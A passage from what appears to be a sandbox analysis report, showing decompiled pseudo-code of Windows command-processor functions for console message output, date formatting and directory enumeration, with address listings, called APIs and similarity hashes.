						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E011E4B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E011DD7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E011E6FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x120b980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0x120b980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}













































                                    0x011dc5d2
                                    0x011dc5d9
                                    0x011dc5e3
                                    0x011dc5e7
                                    0x011dc5e9
                                    0x011dc5ec
                                    0x011dc5f0
                                    0x011dc5f3
                                    0x011dc5fa
                                    0x011dc6b9
                                    0x011dc6b9
                                    0x011dc600
                                    0x011dc601
                                    0x011dc607
                                    0x011dc617
                                    0x00000000
                                    0x011dc61d
                                    0x011dc627
                                    0x011dc628
                                    0x011dc628
                                    0x011dc617
                                    0x011dc62e
                                    0x011dc63c
                                    0x011dc63e
                                    0x011dc643
                                    0x011dc646
                                    0x011dc648
                                    0x011dc64d
                                    0x011dc6ef
                                    0x00000000
                                    0x011dc653
                                    0x011dc653
                                    0x011dc655
                                    0x011dc6c4
                                    0x011dc6cb
                                    0x011dc6d0
                                    0x011dc6d2
                                    0x011dc6dc
                                    0x011dc6dc
                                    0x011dc6e2
                                    0x00000000
                                    0x011dc6d4
                                    0x011dc6d7
                                    0x011dc6da
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dc6da
                                    0x011dc657
                                    0x011dc65e
                                    0x011ead2a
                                    0x011ead30
                                    0x011ead32
                                    0x011eae01
                                    0x011eae04
                                    0x011eae06
                                    0x011eae09
                                    0x011eae0c
                                    0x011eae0e
                                    0x011eae10
                                    0x011eae10
                                    0x011eae12
                                    0x00000000
                                    0x00000000
                                    0x011eae14
                                    0x011eae17
                                    0x011eae1a
                                    0x011eae1d
                                    0x011eae1f
                                    0x011eae1f
                                    0x011eae1f
                                    0x011eae20
                                    0x011eae23
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011eae23
                                    0x011eae25
                                    0x011eae25
                                    0x011eae2d
                                    0x00000000
                                    0x011ead38
                                    0x011ead3f
                                    0x011ead45
                                    0x011ead4b
                                    0x011ead4d
                                    0x011eadf8
                                    0x011eadf8
                                    0x011eadfe
                                    0x00000000
                                    0x011ead53
                                    0x011ead65
                                    0x011ead6b
                                    0x011ead6d
                                    0x00000000
                                    0x011ead73
                                    0x011ead7c
                                    0x011ead87
                                    0x011ead8f
                                    0x011ead95
                                    0x011ead9e
                                    0x011eada2
                                    0x011eadad
                                    0x011eadc2
                                    0x011eadc9
                                    0x011eadca
                                    0x011eadd0
                                    0x011eadda
                                    0x011eaddc
                                    0x011eaddd
                                    0x011eaddf
                                    0x011eade0
                                    0x011eadea
                                    0x011eadf0
                                    0x011eadf3
                                    0x011eae3a
                                    0x011eae46
                                    0x011eae50
                                    0x011eae56
                                    0x011dc6a6
                                    0x011dc6b6
                                    0x011eadf5
                                    0x011eadf5
                                    0x00000000
                                    0x011eadf5
                                    0x011eadf3
                                    0x011ead6d
                                    0x011ead4d
                                    0x011dc664
                                    0x011dc664
                                    0x011dc66f
                                    0x011dc671
                                    0x011dc671
                                    0x011dc673
                                    0x011dc684
                                    0x011dc6e7
                                    0x011dc686
                                    0x011dc686
                                    0x011dc686
                                    0x011dc686
                                    0x00000000
                                    0x011dc684
                                    0x011dc65e
                                    0x00000000
                                    0x011dc688
                                    0x011dc68e
                                    0x011dc690
                                    0x011dc693
                                    0x011dc696
                                    0x011dc699
                                    0x011dc699
                                    0x011dc69e
                                    0x011dc6a0
                                    0x011eae5d
                                    0x011eae61
                                    0x00000000
                                    0x011eae67
                                    0x011eae67
                                    0x011eae6e
                                    0x011eae6e
                                    0x011eae74
                                    0x011eae7a
                                    0x011eae7b
                                    0x011eae7b
                                    0x011eae7b
                                    0x011eae7e
                                    0x011eae84
                                    0x011eae84
                                    0x011dc74b
                                    0x011dc74b
                                    0x011dc74d
                                    0x011dc752
                                    0x011dc754
                                    0x011dc756
                                    0x00000000
                                    0x00000000
                                    0x011dc794
                                    0x011dc797
                                    0x011dc79d
                                    0x011dc7a1
                                    0x00000000
                                    0x011dc7a7
                                    0x011dc7a7
                                    0x00000000
                                    0x011dc7a7
                                    0x011dc781
                                    0x011dc786
                                    0x011dc791
                                    0x00000000
                                    0x011dc791
                                    0x011dc758
                                    0x011dc75b
                                    0x011dc75e
                                    0x011eaea1
                                    0x011eaea3
                                    0x011eaea5
                                    0x011eaeab
                                    0x011eaead
                                    0x011eaeaf
                                    0x011eaeb1
                                    0x011eaeb4
                                    0x011eaeb7
                                    0x011eaeb7
                                    0x011eaeb9
                                    0x011eaec5
                                    0x011eaebb
                                    0x011eaebb
                                    0x011eaec0
                                    0x011eaec0
                                    0x011eaeca
                                    0x011eaecd
                                    0x011eaece
                                    0x011eaece
                                    0x011eaed2
                                    0x011eaed2
                                    0x011eaef3
                                    0x011eaefc
                                    0x00000000
                                    0x011eaefc
                                    0x011dc764
                                    0x011dc764
                                    0x011dc765
                                    0x011dc76a
                                    0x011dc76f
                                    0x011dc770
                                    0x011dc771
                                    0x011dc772
                                    0x011dc77d
                                    0x011dc77f
                                    0x011dc77f
                                    0x011dc77f
                                    0x00000000
                                    0x011dc75e
                                    0x011eae7b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dc6a0
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011DC601
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,011DC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011DC60F
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0120B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 011DC67C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 011DC6DC
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC6E7
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                    • String ID:
                                    • API String ID: 2173784998-0
                                    • Opcode ID: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction ID: 893abb90bef1201fcfc3a439baa35969891ca4895b4f03057563b492d7a5f580
                                    • Opcode Fuzzy Hash: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction Fuzzy Hash: 16818271E00119AFDF28DFA8F89CABEBBB9EF54715F01442AE906D7244DB309941CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E011D5AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E011F3C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0x1213cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0x11fd540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0x11fd598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0x11fd594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0x11fd594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0x11fd594 = _t90;
							 *0x11fd598 = _t164;
							L63:
							_push(_t194);
							_push(0x11ff80c);
							_push(_t206);
							_push(0x11ff80c);
							E011E274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E011E41A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E011E1040( &_v332, 0x80,  *0x11ff7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332,  *0x11fd594,  *0x11fd598) == 0) {
							L32:
							_t208 = GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0x1213cf0 = _t128;
								_push(_t128);
								L51:
								E011DC5A2(0);
								_t97 = 0;
								L25:
								return E011E6FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0x11fd594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0x11fd594 = _t130;
							 *0x11fd598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0x11fd594; // 0x0
							L15:
							_push(E011D5AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E011E1040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E011D68B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E011E25D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E011E25D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E011E1040(_t157, _a8, _t208);
							} else {
								_t101 = E011D68B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E011E1040(_t173, _t197, _t208);
									E011E18C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E011E1040(_t173, _t197,  &_v76);
									E011E18C0(_t157, _a8, " ");
									_push(_t208);
								}
								E011E18C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0x11fd594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
			}























































                                    0x011d5afa
                                    0x011d5b01
                                    0x011d5b05
                                    0x011d5b0b
                                    0x011d5b11
                                    0x011d5b17
                                    0x011d5b24
                                    0x011e9ae4
                                    0x011e9aeb
                                    0x011e9aeb
                                    0x011e9af9
                                    0x011d5b2a
                                    0x011d5b31
                                    0x011d5b45
                                    0x011d5b45
                                    0x011d5b59
                                    0x011d5b6d
                                    0x011d5b75
                                    0x011d5b81
                                    0x011e9bba
                                    0x011e9bc1
                                    0x011e9bc8
                                    0x011e9bcf
                                    0x011e9bdb
                                    0x011e9be3
                                    0x011e9be4
                                    0x011e9be6
                                    0x011e9be6
                                    0x011e9bec
                                    0x011e9bf4
                                    0x011e9c09
                                    0x011e9c0b
                                    0x011e9c0d
                                    0x011e9c0f
                                    0x011e9c0f
                                    0x011e9bf6
                                    0x011e9bf6
                                    0x011e9bf8
                                    0x011e9bfa
                                    0x011e9bfc
                                    0x011e9c02
                                    0x011e9c02
                                    0x011e9c11
                                    0x011e9c1a
                                    0x011e9c4c
                                    0x00000000
                                    0x011e9c1c
                                    0x011e9c24
                                    0x011e9c2b
                                    0x011e9c2e
                                    0x011e9c36
                                    0x011e9c3e
                                    0x011e9c3f
                                    0x011e9c44
                                    0x011e9c51
                                    0x011e9c51
                                    0x011e9c57
                                    0x011e9c58
                                    0x011e9c59
                                    0x011e9c62
                                    0x011e9c67
                                    0x011e9c6c
                                    0x00000000
                                    0x011e9c6c
                                    0x011e9c30
                                    0x00000000
                                    0x011e9c30
                                    0x011d5b87
                                    0x011d5b87
                                    0x011d5baa
                                    0x011e9b09
                                    0x011e9b11
                                    0x011e9b11
                                    0x011d5bb0
                                    0x011d5bb7
                                    0x011d5bbf
                                    0x011d5bc3
                                    0x011d5c07
                                    0x011d5c32
                                    0x011d5d34
                                    0x011d5d53
                                    0x011d5d57
                                    0x011e9b8d
                                    0x011e9b95
                                    0x011e9b9f
                                    0x011e9b9f
                                    0x011e9ba4
                                    0x011e9bac
                                    0x011e9bac
                                    0x011e9bb3
                                    0x011d5cca
                                    0x011d5cda
                                    0x011d5cda
                                    0x011d5d5d
                                    0x011d5d68
                                    0x011d5d6f
                                    0x011d5d72
                                    0x011e9ba9
                                    0x011e9baa
                                    0x011e9baa
                                    0x00000000
                                    0x011e9baa
                                    0x011d5d7a
                                    0x011d5d8c
                                    0x011d5d93
                                    0x011d5da4
                                    0x011e9b98
                                    0x011e9b9e
                                    0x00000000
                                    0x011e9b9e
                                    0x011d5daa
                                    0x011d5daa
                                    0x011d5c46
                                    0x011d5c52
                                    0x011d5c55
                                    0x011d5c59
                                    0x011d5c60
                                    0x011e9c79
                                    0x011e9c94
                                    0x011e9c9a
                                    0x011e9c9b
                                    0x011e9c96
                                    0x011e9c96
                                    0x011e9c97
                                    0x011e9c97
                                    0x011e9ca1
                                    0x011e9c7b
                                    0x011e9c7b
                                    0x011e9c81
                                    0x011e9c87
                                    0x011e9ca9
                                    0x011d5cc8
                                    0x011d5cc8
                                    0x00000000
                                    0x011d5cc8
                                    0x011d5c6d
                                    0x011e9cd4
                                    0x011d5c80
                                    0x011d5c80
                                    0x011d5c85
                                    0x011d5c88
                                    0x011d5c8c
                                    0x011e9cb1
                                    0x011e9cc0
                                    0x011e9cc8
                                    0x011d5c92
                                    0x011d5c96
                                    0x011d5ca5
                                    0x011d5caa
                                    0x011d5caa
                                    0x011d5cb0
                                    0x011d5cb0
                                    0x011d5cb5
                                    0x011d5cb8
                                    0x011d5cba
                                    0x011d5cba
                                    0x011d5cbd
                                    0x011d5cbf
                                    0x011d5cc6
                                    0x00000000
                                    0x011d5cc6
                                    0x011d5c38
                                    0x011d5c40
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d5bc5
                                    0x011d5bc5
                                    0x011d5bcd
                                    0x011d5bd0
                                    0x011d5bd1
                                    0x011d5bd5
                                    0x011e9b1d
                                    0x011e9b24
                                    0x00000000
                                    0x011e9b24
                                    0x011d5bdd
                                    0x011d5bf2
                                    0x011d5cdd
                                    0x011d5cdf
                                    0x011d5ce1
                                    0x011d5ce1
                                    0x011d5ce3
                                    0x011d5ce4
                                    0x011d5ceb
                                    0x011d5cf3
                                    0x011d5cf9
                                    0x011e9b2d
                                    0x011e9b31
                                    0x011e9b35
                                    0x011e9b35
                                    0x011e9b3e
                                    0x011e9b82
                                    0x011e9b40
                                    0x011e9b40
                                    0x011e9b46
                                    0x011e9b4b
                                    0x011e9b51
                                    0x011e9b51
                                    0x011e9b54
                                    0x011e9b56
                                    0x011e9b65
                                    0x011e9b74
                                    0x011e9b7a
                                    0x011e9b7a
                                    0x00000000
                                    0x011e9b3e
                                    0x011d5cff
                                    0x011d5d01
                                    0x011d5d04
                                    0x011d5d04
                                    0x011d5d07
                                    0x011d5d09
                                    0x011d5d23
                                    0x011d5d29
                                    0x011d5d2c
                                    0x011d5d2c
                                    0x011d5bf4
                                    0x011d5bf4
                                    0x011d5bf9
                                    0x011d5bfe
                                    0x011d5bfe
                                    0x011d5c01
                                    0x00000000
                                    0x011d5c01
                                    0x011d5bc3

                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D5B31
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B45
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D5B59
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B6D
                                    • realloc.MSVCRT ref: 011E9C24
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 011D5BA2
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 011D5C2A
                                    • memmove.MSVCRT ref: 011D5D23
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 011D5D4D
                                    • realloc.MSVCRT ref: 011D5D68
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 011D5D9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                    • String ID: %02d%s%02d%s%02d$%s $%s %s
                                    • API String ID: 2927284792-4023967598
                                    • Opcode ID: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction ID: 76cd7a06cad67bd7d68d8fe329aa2d965ab84651da7277fc0e31147f3469e279
                                    • Opcode Fuzzy Hash: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction Fuzzy Hash: 14C1B471A006299BDF2CDB98DC4CAFE77F9EB99708F004169E90AD7244DB319E81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D85EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E011D85EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E011D8885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E011E0D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E011E0CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E011E0CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0x11fd544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E011DC5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0x11fd544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E011E1040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E011D83F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
